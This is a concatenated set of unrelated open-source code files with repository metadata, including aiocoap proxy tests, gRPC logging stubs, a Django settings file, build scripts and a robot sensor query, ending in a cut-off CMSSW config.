        self.assertEqual(response.code, aiocoap.CONTENT, "GET with path based proxying was not successful)")
    @unittest.skipIf(common.using_simple6, "Some proxy tests fail with simple6 (https://github.com/chrysn/aiocoap/issues/88)")
    def test_options(self):
        """Forward-proxy and unknown-critical options are rejected; safe ones pass."""
        yieldfrom = lambda f: self.loop.run_until_complete(f)
        def req():
            # Fresh GET with a routable uri_host alias already set.
            request = aiocoap.Message(code=aiocoap.GET)
            request.unresolved_remote = self.proxyaddress
            request.opt.uri_path = ('big',)
            request.opt.uri_host = self.name_for_real_server
            return request
        # A reverse proxy must refuse forward-proxying (Proxy-Scheme).
        request = req()
        request.opt.proxy_scheme = 'coap'
        response = yieldfrom(self.client.request(request).response)
        self.assertEqual(response.code, aiocoap.BAD_OPTION, "Reverse proxy supports proxying even though it shouldn't.")
        # An unknown unsafe option must be rejected...
        request = req()
        request.opt.add_option(aiocoap.optiontypes.StringOption(2**10 + 2, "can't proxy this"))
        response = yieldfrom(self.client.request(request).response)
        self.assertEqual(response.code, aiocoap.BAD_OPTION, "Proxy did not react to unsafe option.")
        # ...while an unknown safe-to-forward option must be passed through.
        request = req()
        request.opt.add_option(aiocoap.optiontypes.StringOption(2**10, "nothing to see here"))
        response = yieldfrom(self.client.request(request).response)
        self.assertEqual(response.code, aiocoap.CONTENT, "Proxy did not ignore to safe-to-forward option.")
|
[
"[email protected]"
] | |
449248113ab98dd46f92d9e76576d832177aefbd
|
f9acfbff2744c014cd4adbc53d75316cacc00896
|
/pycspr/api/get_node_peers.py
|
caff8d058e48be88cc650078538c0c1ab16f9b24
|
[
"Apache-2.0"
] |
permissive
|
Shr1ftyy/casper-python-sdk
|
30fb3edc42551faef0b9bf10bf5a13ed8b5ac9f5
|
1c32ef89ef269f0307d530cfd635cfcbb3f29290
|
refs/heads/main
| 2023-07-27T17:17:40.054075 | 2021-07-29T09:58:12 | 2021-07-29T09:58:12 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 490 |
py
|
import jsonrpcclient as rpc_client
from pycspr.client import NodeConnectionInfo
# Method upon client to be invoked.
_API_ENDPOINT = "info_get_peers"
def execute(connection_info: NodeConnectionInfo) -> dict:
    """Query a node's JSON-RPC endpoint for its peer set.

    :param connection_info: Information required to connect to a node.
    :returns: Node peers information.
    """
    rpc_response = rpc_client.request(
        connection_info.address_rpc,
        _API_ENDPOINT,
    )
    return rpc_response.data.result["peers"]
|
[
"[email protected]"
] | |
70f0c42a9f45b0c0587d68145739c19c27479312
|
6efea391d0dd6087d8753057cff45867884fe5f1
|
/google/cloud/logging_v2/proto/logging_pb2_grpc.py
|
e1759bbc1b990fe9d20bf576c1c5f12009895806
|
[
"Apache-2.0"
] |
permissive
|
tswast/python-logging
|
d9c4ae1ee87fb29436e2f16d9adac2a7a2d08378
|
c4387b307f8f3502fb53ae1f7e1144f6284280a4
|
refs/heads/master
| 2022-12-30T19:50:14.840163 | 2020-08-12T20:28:40 | 2020-08-12T20:28:40 | 298,009,362 | 0 | 0 |
Apache-2.0
| 2020-09-23T15:12:47 | 2020-09-23T15:12:46 | null |
UTF-8
|
Python
| false | false | 6,922 |
py
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.logging_v2.proto import (
logging_pb2 as google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2,
)
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
class LoggingServiceV2Stub(object):
    """Service for ingesting and querying logs.
    """
    # NOTE(review): generated by the gRPC Python plugin (see file header);
    # do not hand-edit — regenerate from the .proto instead.
    def __init__(self, channel):
        """Constructor.
        Args:
            channel: A grpc.Channel.
        """
        # Each attribute is a unary-unary callable bound to one RPC method,
        # pairing the request serializer with the response deserializer.
        self.DeleteLog = channel.unary_unary(
            "/google.logging.v2.LoggingServiceV2/DeleteLog",
            request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.DeleteLogRequest.SerializeToString,
            response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
        )
        self.WriteLogEntries = channel.unary_unary(
            "/google.logging.v2.LoggingServiceV2/WriteLogEntries",
            request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesResponse.FromString,
        )
        self.ListLogEntries = channel.unary_unary(
            "/google.logging.v2.LoggingServiceV2/ListLogEntries",
            request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesResponse.FromString,
        )
        self.ListMonitoredResourceDescriptors = channel.unary_unary(
            "/google.logging.v2.LoggingServiceV2/ListMonitoredResourceDescriptors",
            request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.FromString,
        )
        self.ListLogs = channel.unary_unary(
            "/google.logging.v2.LoggingServiceV2/ListLogs",
            request_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsResponse.FromString,
        )
class LoggingServiceV2Servicer(object):
    """Service for ingesting and querying logs.
    """
    # NOTE(review): generated by the gRPC Python plugin (see file header);
    # subclasses override these handlers — the defaults reply UNIMPLEMENTED.
    def DeleteLog(self, request, context):
        """Deletes all the log entries in a log. The log reappears if it receives new
        entries. Log entries written shortly before the delete operation might not
        be deleted. Entries received after the delete operation with a timestamp
        before the operation will be deleted.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")
    def WriteLogEntries(self, request, context):
        """Writes log entries to Logging. This API method is the
        only way to send log entries to Logging. This method
        is used, directly or indirectly, by the Logging agent
        (fluentd) and all logging libraries configured to use Logging.
        A single request may contain log entries for a maximum of 1000
        different resources (projects, organizations, billing accounts or
        folders)
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")
    def ListLogEntries(self, request, context):
        """Lists log entries. Use this method to retrieve log entries that originated
        from a project/folder/organization/billing account. For ways to export log
        entries, see [Exporting Logs](/logging/docs/export).
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")
    def ListMonitoredResourceDescriptors(self, request, context):
        """Lists the descriptors for monitored resource types used by Logging.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")
    def ListLogs(self, request, context):
        """Lists the logs in projects, organizations, folders, or billing accounts.
        Only logs that have entries are listed.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")
def add_LoggingServiceV2Servicer_to_server(servicer, server):
    """Register *servicer*'s handlers for the LoggingServiceV2 RPCs on *server*.

    Generated registration helper: maps each RPC name to a unary-unary
    handler wired to the corresponding servicer method plus the protobuf
    (de)serializers for its request and response messages.
    """
    rpc_method_handlers = {
        "DeleteLog": grpc.unary_unary_rpc_method_handler(
            servicer.DeleteLog,
            request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.DeleteLogRequest.FromString,
            response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
        ),
        "WriteLogEntries": grpc.unary_unary_rpc_method_handler(
            servicer.WriteLogEntries,
            request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesRequest.FromString,
            response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.WriteLogEntriesResponse.SerializeToString,
        ),
        "ListLogEntries": grpc.unary_unary_rpc_method_handler(
            servicer.ListLogEntries,
            request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesRequest.FromString,
            response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogEntriesResponse.SerializeToString,
        ),
        "ListMonitoredResourceDescriptors": grpc.unary_unary_rpc_method_handler(
            servicer.ListMonitoredResourceDescriptors,
            request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsRequest.FromString,
            response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListMonitoredResourceDescriptorsResponse.SerializeToString,
        ),
        "ListLogs": grpc.unary_unary_rpc_method_handler(
            servicer.ListLogs,
            request_deserializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsRequest.FromString,
            response_serializer=google_dot_cloud_dot_logging__v2_dot_proto_dot_logging__pb2.ListLogsResponse.SerializeToString,
        ),
    }
    # A generic handler lets the server dispatch by fully-qualified service name.
    generic_handler = grpc.method_handlers_generic_handler(
        "google.logging.v2.LoggingServiceV2", rpc_method_handlers
    )
    server.add_generic_rpc_handlers((generic_handler,))
|
[
"[email protected]"
] | |
1c191670b95cd97eb7e9927c5966fe0fe092eed3
|
c259bd9e4a570a1fa37949655530d778e5f5c46d
|
/mysite/.history/mysite/settings_20211014220254.py
|
edf1209e555479d4892a4fb712109c1d5b7bea7a
|
[] |
no_license
|
ritikalohia/django-rest-students
|
0cc56f435b7b2af881adfd7cace54eef98213c57
|
ca5f9f466fcd74fef8ce91f019bcb6e7d83c8e20
|
refs/heads/main
| 2023-08-15T21:51:18.988691 | 2021-10-14T18:19:04 | 2021-10-14T18:19:04 | 417,219,011 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,239 |
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.2.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-vw0@qaq+af@an^ipzwchu$p*ywufp074e73!dtzcbara-qicvk'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
|
[
"[email protected]"
] | |
f565c7f1049dafaeb6f59a5d1402e33d61f66f26
|
cccf8da8d41ae2c14f5f4313c1edcf03a27956bb
|
/python/python2latex/writeLTXnonfrenchspacing.py
|
500b80bebf55e18223970983e73099ddd5dc5c8a
|
[] |
no_license
|
LucaDiStasio/transpilers
|
e8f8ac4d99be3b42a050148ca8fbc5d025b83290
|
c55d4f5240083ffd512f76cd1d39cff1016909b8
|
refs/heads/master
| 2021-01-12T01:57:00.540331 | 2017-11-01T13:59:55 | 2017-11-01T13:59:55 | 78,448,378 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,438 |
py
|
# Autogenerated with SMOP
from smop.core import *
#
@function
def writeLTXnonfrenchspacing(filepath=None, args=None, options=None, *varargs, **kwargs):
    # Bug fix: the original (SMOP-autogenerated) signature declared both
    # `args=None` and `*args`, a duplicate argument name, which is a
    # SyntaxError in Python. The variadic tail is renamed to `varargs`;
    # nothing in the body referenced it, so behavior is unchanged.
    varargin = writeLTXnonfrenchspacing.varargin
    nargin = writeLTXnonfrenchspacing.nargin
    ##
    #==============================================================================
    # Copyright (c) 2016-2017 Universite de Lorraine & Lulea tekniska universitet
    # Author: Luca Di Stasio <[email protected]>
    #         <[email protected]>
    # Redistribution and use in source and binary forms, with or without
    # modification, are permitted provided that the following conditions are met:
    #
    # Redistributions of source code must retain the above copyright
    # notice, this list of conditions and the following disclaimer.
    # Redistributions in binary form must reproduce the above copyright
    # notice, this list of conditions and the following disclaimer in
    # the documentation and/or other materials provided with the distribution
    # Neither the name of the Universite de Lorraine or Lulea tekniska universitet
    # nor the names of its contributors may be used to endorse or promote products
    # derived from this software without specific prior written permission.
    #
    # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
    # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
    # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
    # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
    # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
    # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
    # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
    # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
    # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
    # POSSIBILITY OF SUCH DAMAGE.
    #==============================================================================
    # DESCRIPTION
    #
    # A function to create a Latex file.
    # Setting the command untoggles the command\frenchspacingand activates LaTeX standards to insert more space after a period (.) than after an ordinary character.#
    ##
    # Append the \nonfrenchspacing command (with optional [options] and
    # {args}) to the file at `filepath`. Helpers (fopen, strcat, arange,
    # size, ...) come from smop.core and mimic MATLAB 1-based semantics.
    fileId=fopen(filepath,'a')
    fprintf(fileId,'\\n')
    line='\\nonfrenchspacing'
    if logical_not(strcmp(options,'none')) and logical_not(strcmp(options,'NONE')) and logical_not(strcmp(options,'None')):
        line=strcat(line,'[',options,']')
    if logical_not(isempty(args)):
        line=strcat(line,'{')
        for i in arange(1,length(args)).reshape(-1):
            dims=size(args)
            # Pick the element access pattern matching the argument's shape
            # (scalar, column vector, or row vector); MATLAB-style indexing.
            if dims[1] == 1 and dims[2] == 1:
                line=strcat(line,args[i])
            else:
                if dims[1] > 1 and dims[2] == 1:
                    try:
                        line=strcat(line,args[i][1])
                    finally:
                        pass
                else:
                    if dims[1] == 1 and dims[2] > 1:
                        try:
                            line=strcat(line,args[1][i])
                        finally:
                            pass
                    else:
                        line=strcat(line,args[i])
        line=strcat(line,'}')
    fprintf(fileId,strcat(line,'\\n'))
    fclose(fileId)
    return
|
[
"[email protected]"
] | |
caea2ec58c57adbd5f5dc9e9a63d8dc2b3c96220
|
85d41b34a472a2ec726b6fe9ebccc19a75159641
|
/src/run_interrogate.py
|
c9fd70730d2eb2e009a3c248d42ab3bec617022d
|
[] |
no_license
|
toontownretro/libotp
|
186dacbe920b39a44840cc568cd76f1ea87ebd03
|
1ddfbd6526e88e887468c3c517a5d07dbc6e59be
|
refs/heads/master
| 2022-12-19T10:55:28.239247 | 2020-09-14T00:59:03 | 2020-09-14T00:59:03 | 245,036,965 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,661 |
py
|
import subprocess
import glob
import sys
import os
srcdir = os.path.abspath(os.path.dirname(__file__))
pandadir = os.path.abspath(sys.argv[1])
def run_command(cmd):
    """Run *cmd* through the shell, streaming its output; exit on failure.

    The command's stdout/stderr are forwarded to this process's streams.
    If the command returns a non-zero code, the failure is reported and the
    whole script terminates with that code.
    """
    proc = subprocess.Popen(cmd, stdout=sys.stdout, stderr=sys.stderr, shell=True)
    code = proc.wait()
    if code == 0:
        return
    print("\n")
    print('The following command return a non-zero value (%d): %s' % (code, cmd))
    sys.exit(code)
def interrogate(module):
    """Run Panda3D's `interrogate` tool over one libotp module's sources.

    Builds the interrogate command line (defines, include paths, output
    .cxx/.in names) for *module*, appends every .h/.cxx file found in the
    module's source directory, and executes it via run_command.
    Relies on the module-level globals `pandadir` and `srcdir`.
    """
    print('Interrogating', module)
    cmd = os.path.join(pandadir, 'bin', 'interrogate')
    # Preprocessor defines and parser flags; %(...)s placeholders are
    # substituted in one pass below.
    cmd += ' -D__inline -DCPPPARSER -DP3_INTERROGATE=1 -D__cplusplus -fnames -string -refcount -assert'
    cmd += ' -S"%(pandadir)s/include/parser-inc" -S"%(pandadir)s/include" -I"%(pandadir)s/include" -I"%(srcdir)s/movement" -I"%(srcdir)s/nametag"'
    cmd += ' -I"%(srcdir)s/otpbase"'
    cmd += ' -srcdir "%(srcdir)s/%(module)s"'
    cmd += ' -oc "%(srcdir)s/%(module)s_igate.cxx" -od "%(srcdir)s/lib%(module)s.in" -python-native -DCPPPARSER -D__STDC__=1'
    cmd += ' -D__cplusplus -D__inline -D_X86_ -DWIN32_VC -DWIN32 -module libotp -library %(module)s -Dvolatile='
    cmd = cmd % {'pandadir': pandadir, 'module': module, 'srcdir': srcdir}
    # Interrogate wants bare filenames relative to -srcdir.
    files = glob.glob(os.path.join(srcdir, module, '*.h'))
    files += glob.glob(os.path.join(srcdir, module, '*.cxx'))
    for file in files:
        cmd += ' %s' % os.path.basename(file)
    run_command(cmd)
for module in ('movement', 'nametag'):
interrogate(module)
os.chdir(srcdir)
cmd = os.path.join(pandadir, 'bin', 'interrogate_module') + ' -python-native -oc libotp_module.cxx'
cmd += ' -library libotp -module libotp libnametag.in libmovement.in'
run_command(cmd)
|
[
"[email protected]"
] | |
9172f47544a3ec96a3b22276472d050776365b40
|
8df5df20ac10a8dc81f7ac6e21e835553a8f5e2d
|
/src/sleekapps/threads/signals/thread/thread.py
|
62045b0ba77e61bb8a378d1da88a8b31a5019dbe
|
[] |
no_license
|
adepeter/sleekforum
|
7be71907d26623c43cd78a6da77a2398c1c25e26
|
35385e648974cdf009732af4c50b69a1825f7fda
|
refs/heads/master
| 2022-09-18T02:45:42.522128 | 2021-10-23T06:41:44 | 2021-10-23T06:41:44 | 208,669,487 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,075 |
py
|
from django.core.cache import cache
from django.db.models.signals import post_save
from django.dispatch import receiver, Signal
from .models import Thread, ThreadView
# from ..miscs.models.activity import Action
# from ..miscs.signals.activity import activity_updater
# #
# # @receiver(post_save, sender=Action)
# # def like_and_dislike_handler(sender, instance, created, **kwargs):
# # from django.contrib.contenttypes.models import ContentType
# # ct = ContentType.objects.get_for_model(instance).get_object_for_this_type()
# # if created:
# # get_ct_for_obj_of_instance = instance.content_object
# # if instance.action_value == Action.LIKE:
# # get_ct_for_obj_of_instance.likes = ct
# # print('Ading likes counter')
# # else:
# # print('Adding dislike counter')
# # get_ct_for_obj_of_instance.dislikes = ct
# # get_ct_for_obj_of_instance.save()
# #
# #
# # # @receiver(activity_updater)
# # # def hal(sender, **kwargs):
# # # print('Sender is', sender, kwargs.get('obj'))
|
[
"[email protected]"
] | |
47466b53530a7e9c3f7c8c4065f831ce72d30c20
|
12abe02e205d3e8dabe78fb5a93ccca89e2c42c4
|
/tools/prepare_client.py
|
6e73dd03164c3faee99d8c53e13fe17142da37b8
|
[] |
no_license
|
nate97/toontown-src-py3.0
|
55092b2973b76e6b6d566887f44c52822684394c
|
f76c515801ae08c40b264b48365211fd44b137eb
|
refs/heads/master
| 2022-07-07T05:23:22.071185 | 2022-06-22T16:36:10 | 2022-06-22T16:36:10 | 187,682,471 | 15 | 8 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,291 |
py
|
#!/usr/bin/env python2
import argparse
import hashlib
import os
from panda3d.core import *
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--distribution', default='en',
help='The distribution string.')
parser.add_argument('--build-dir', default='build',
help='The directory in which to store the build files.')
parser.add_argument('--src-dir', default='..',
help='The directory of the Toontown Infinite source code.')
parser.add_argument('--server-ver', default='toontown-dev',
help='The server version of this build.')
parser.add_argument('--build-mfs', action='store_true',
help='When present, the resource multifiles will be built.')
parser.add_argument('--resources-dir', default='../resources',
help='The directory of the Toontown Infinite resources.')
parser.add_argument('--config-dir', default='../config/release',
help='The directory of the Toontown Infinite configuration files.')
parser.add_argument('--include', '-i', action='append',
help='Explicitly include this file in the build.')
parser.add_argument('--exclude', '-x', action='append',
help='Explicitly exclude this file from the build.')
parser.add_argument('--vfs', action='append',
help='Add this file to the virtual file system at runtime.')
parser.add_argument('modules', nargs='*', default=['otp', 'toontown'],
help='The Toontown Infinite modules to be included in the build.')
args = parser.parse_args()
print('Preparing the client...')
# Create a clean directory to store the build files in:
if os.path.exists(args.build_dir):
shutil.rmtree(args.build_dir)
os.mkdir(args.build_dir)
print('Build directory = ' + args.build_dir)
# Copy the provided Toontown Infinite modules:
def minify(f):
    """Return *f*'s lines joined into one string with ``if __debug__:``
    blocks removed.

    The guard line and its body are dropped; the body of a matching
    ``else:`` branch is kept, dedented by one level (4 spaces); an ``elif``
    at the guard's indent is rewritten to a plain ``if``.
    """
    out = ''
    in_debug = False    # currently inside an `if __debug__:` block
    in_else = False     # currently inside that block's `else:` branch
    guard_indent = 0    # column at which the `if __debug__:` line started
    for line in f:
        indent = len(line) - len(line.lstrip())
        if 'if __debug__:' not in line and not in_debug:
            # Ordinary line outside any debug block: keep verbatim.
            out += line
            continue
        elif 'if __debug__:' in line:
            # Start of a debug block: remember its indentation, drop the line.
            in_debug = True
            guard_indent = indent
            continue
        # From here on we are inside a debug block.
        if indent <= guard_indent:
            # Dedented back to (or past) the guard's level.
            if 'else' in line:
                in_else = True
                continue
            if 'elif' in line:
                # `elif cond:` becomes `if cond:` — strip the leading "el".
                line = line[:indent] + line[indent + 2:]
            out += line
            in_debug = False
            in_else = False
            guard_indent = 0
            continue
        if in_else:
            # Keep else-branch bodies, dedented one level.
            out += line[4:]
    return out
for module in args.modules:
print('Writing module...', module)
for root, folders, files in os.walk(os.path.join(args.src_dir, module)):
outputDir = root.replace(args.src_dir, args.build_dir)
if not os.path.exists(outputDir):
os.mkdir(outputDir)
for filename in files:
if filename not in args.include:
if not filename.endswith('.py'):
continue
if filename.endswith('UD.py'):
continue
if filename.endswith('AI.py'):
continue
if filename in args.exclude:
continue
with open(os.path.join(root, filename), 'r') as f:
data = minify(f)
with open(os.path.join(outputDir, filename), 'w') as f:
f.write(data)
# Let's write game_data.py now. game_data.py is a compile-time generated
# collection of data that will be used by the game at runtime. It contains the
# PRC file data, and (stripped) DC file:
# First, we need to add the configuration pages:
configData = []
with open('../config/general.prc') as f:
configData.append(f.read())
configFileName = args.distribution + '.prc'
configFilePath = os.path.join(args.config_dir, configFileName)
print('Using configuration file: ' + configFilePath)
with open(configFilePath) as f:
data = f.readlines()
# Replace server-version definitions with the desired server version:
for i, line in enumerate(data):
if 'server-version' in line:
data[i] = 'server-version ' + args.server_ver
# Add our virtual file system data:
data.append('\n# Virtual file system...\nmodel-path /\n')
for filepath in args.vfs:
data.append('vfs-mount %s /\n' % filepath)
configData.append('\n'.join(data))
# Next, we need the DC file:
dcData = ''
filepath = os.path.join(args.src_dir, 'astron/dclass')
for filename in os.listdir(filepath):
if filename.endswith('.dc'):
fullpath = str(Filename.fromOsSpecific(os.path.join(filepath, filename)))
print('Reading %s...' % fullpath)
with open(fullpath, 'r') as f:
data = f.read()
for line in data.split('\n'):
if 'import' in line:
data = data.replace(line + '\n', '')
dcData += data
# Finally, write our data to game_data.py:
print('Writing game_data.py...')
gameData = 'CONFIG = %r\nDC = %r\n'
with open(os.path.join(args.build_dir, 'game_data.py'), 'wb') as f:
f.write(gameData % (configData, dcData.strip()))
# We have all of the code gathered together. Let's create the multifiles now:
if args.build_mfs:
print('Building multifiles...')
dest = os.path.join(args.build_dir, 'resources')
if not os.path.exists(dest):
os.mkdir(dest)
dest = os.path.realpath(dest)
os.chdir(args.resources_dir)
for phase in os.listdir('.'):
if not phase.startswith('phase_'):
continue
if not os.path.isdir(phase):
continue
filename = phase + '.mf'
print('Writing...', filename)
filepath = os.path.join(dest, filename)
os.system('multify -c -f "%s" "%s"' % (filepath, phase))
print('Done preparing the client.')
|
[
"[email protected]"
] | |
d2aa6ff19836d34ff0dab5a45d47cf65bd7f3324
|
02802ecfff8639edc093068da740ded8ee8228aa
|
/test/test_inline_object8.py
|
4de4d72fa7c421eec5426415f92be8159709b6ab
|
[] |
no_license
|
mintproject/data-catalog-client
|
0fc406c2063864144a9a995e98724144b43feb66
|
22afd6341e5f66594c88134834d58e4136e4983a
|
refs/heads/master
| 2020-12-08T21:56:02.785671 | 2020-05-13T03:53:51 | 2020-05-13T03:53:51 | 233,105,679 | 1 | 1 | null | 2020-05-13T03:53:53 | 2020-01-10T18:17:55 |
Python
|
UTF-8
|
Python
| false | false | 873 |
py
|
# coding: utf-8
"""
MINT Data Catalog
API Documentation for MINT Data Catalog # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datacatalog
from datacatalog.models.inline_object8 import InlineObject8 # noqa: E501
from datacatalog.rest import ApiException
class TestInlineObject8(unittest.TestCase):
    """InlineObject8 unit test stubs (OpenAPI-generator scaffolding)."""
    def setUp(self):
        # No shared fixtures required yet.
        pass
    def tearDown(self):
        # Nothing to clean up.
        pass
    def testInlineObject8(self):
        """Test InlineObject8"""
        # FIXME: construct object with mandatory attributes with example values
        # model = datacatalog.models.inline_object8.InlineObject8()  # noqa: E501
        pass
|
[
"[email protected]"
] | |
c8e9a6df4de37b414ea033965c80120dab0b6e57
|
d36975caedab71aaaac26156105afaf59448e445
|
/机器人传感系统/2.超声波距离传感器/读取距离数据_RestfulAPI.py
|
00db909c44b8986e49e69f50e5f9072b82fad478
|
[
"MIT"
] |
permissive
|
mukgong/AI-robot
|
3d84b444ac8d1a0cdb061eda19bb9319c9af036e
|
f89d91b67705878d9e87ae09a35b436495b66707
|
refs/heads/master
| 2022-12-25T01:07:37.174852 | 2020-10-05T01:44:50 | 2020-10-05T01:44:50 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 500 |
py
|
import requests
import json
def get_sensor():
    """Query the local robot REST API for ultrasonic readings and print them.

    Issues a GET to the fixed localhost endpoint, dumps the raw response
    body, then — when the payload carries data — prints the id and value of
    the first ultrasonic sensor entry.
    """
    url = "http://127.0.0.1:9090/v1/sensors/ultrasonic"
    response = requests.get(url=url, headers={'Content-Type': 'application/json'})
    print(response.content)
    res = json.loads(response.content)
    if len(res["data"]) > 0:
        first = res["data"]["ultrasonic"][0]
        print("ultrasonic id = %d : value = %d " % (first["id"], first["value"]))
if __name__ == '__main__':
get_sensor()
|
[
"[email protected]"
] | |
4e18bb629d0cf47b38d4f4e6bcbfd8840cd16497
|
84abce44bd0278fa99e9556168290675f399834c
|
/EcalAlCaRecoProducers/config/reRecoTags/pulseShapeStudy_m100.py
|
1130a38c27fbf75c327984fb96b19892b85b5ca7
|
[] |
no_license
|
ECALELFS/ECALELF
|
7c304c6b544b0f22a4b62cf942f47fa8b58abef0
|
62a046cdf59badfcb6281a72923a0f38fd55e183
|
refs/heads/master
| 2021-01-23T13:36:31.574985 | 2017-06-22T12:26:28 | 2017-06-22T12:26:28 | 10,385,620 | 1 | 9 | null | 2017-06-30T12:59:05 | 2013-05-30T15:18:55 |
C++
|
UTF-8
|
Python
| false | false | 2,240 |
py
|
import FWCore.ParameterSet.Config as cms
from CondCore.DBCommon.CondDBSetup_cfi import *
RerecoGlobalTag = cms.ESSource("PoolDBESSource",
CondDBSetup,
